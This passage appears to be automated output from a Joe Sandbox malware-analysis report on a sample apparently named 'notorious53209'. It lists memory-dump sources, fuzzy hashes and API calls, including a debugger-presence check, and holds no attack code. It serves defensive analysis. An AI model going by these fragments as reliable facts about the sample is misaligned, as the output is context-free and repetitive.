                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: __calloc_crt
                                            • String ID: @R/
                                            • API String ID: 3494438863-2894550621
                                            • Opcode ID: 553dfd389ef4f71d5ab0ef1cf424f1ba38c89fac7917e1dd5459323778242b5a
                                            • Instruction ID: d15b673bd13cc020497162913abd28f7bee94d4bbb387b9054ffad143e92d956
                                            • Opcode Fuzzy Hash: 553dfd389ef4f71d5ab0ef1cf424f1ba38c89fac7917e1dd5459323778242b5a
                                            • Instruction Fuzzy Hash: 3BF0C27132A7139BF724CF19FE0DA7127A5E740371B900836ED00DB585EB7088A9CB88
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ClassName_wcscmp
                                            • String ID: #32770
                                            • API String ID: 2292705959-463685578
                                            • Opcode ID: de3d059b7b947e266dd07dc8c5983cbb127705e219e8ef8ed669358a1553487d
                                            • Instruction ID: 1c69d7e354d7a6bde4815b4b926332f3266ebfa07960b95370b94f39c8966d47
                                            • Opcode Fuzzy Hash: de3d059b7b947e266dd07dc8c5983cbb127705e219e8ef8ed669358a1553487d
                                            • Instruction Fuzzy Hash: 9BE09272E042292AE7209BA9AC49AA7F7ACEB45771F0001AAFD14D3050E560AA558BE1
                                            APIs
                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 002881CA
                                              • Part of subcall function 00253598: _doexit.LIBCMT ref: 002535A2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Message_doexit
                                            • String ID: AutoIt$Error allocating memory.
                                            • API String ID: 1993061046-4017498283
                                            • Opcode ID: 19b5b390827b924381deb83cfa8a3298f5e286bf6a2d6bba56ca83113c204122
                                            • Instruction ID: c9898aef70cfd038ce68b911a9a6f65a54d763d7fa2ebe381b7fe9f50e36ec7e
                                            • Opcode Fuzzy Hash: 19b5b390827b924381deb83cfa8a3298f5e286bf6a2d6bba56ca83113c204122
                                            • Instruction Fuzzy Hash: 40D05B323E535832D21572A57D0BFC576484B0AF52F404416FF08555D38EE155F146DD
                                            APIs
                                              • Part of subcall function 0026B564: _memset.LIBCMT ref: 0026B571
                                              • Part of subcall function 00250B84: InitializeCriticalSectionAndSpinCount.KERNEL32(002F5158,00000000,002F5144,0026B540,?,?,?,0023100A), ref: 00250B89
                                            • IsDebuggerPresent.KERNEL32(?,?,?,0023100A), ref: 0026B544
                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0023100A), ref: 0026B553
                                            Strings
                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0026B54E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                            • API String ID: 3158253471-631824599
                                            • Opcode ID: bfd4d79d8fd6b6b2993a5b5ac4a451113bb3138e7cc20658f46b83a17cdec13a
                                            • Instruction ID: 2fd9a1cc4d4ecced35b065727d1ce73806aa6c9c2052d6aa2632a788ac15475b
                                            • Opcode Fuzzy Hash: bfd4d79d8fd6b6b2993a5b5ac4a451113bb3138e7cc20658f46b83a17cdec13a
                                            • Instruction Fuzzy Hash: EDE06DB02203118BD362DF28E9487827BE0AF00754F048A2DE846C2361E7B4E898CF61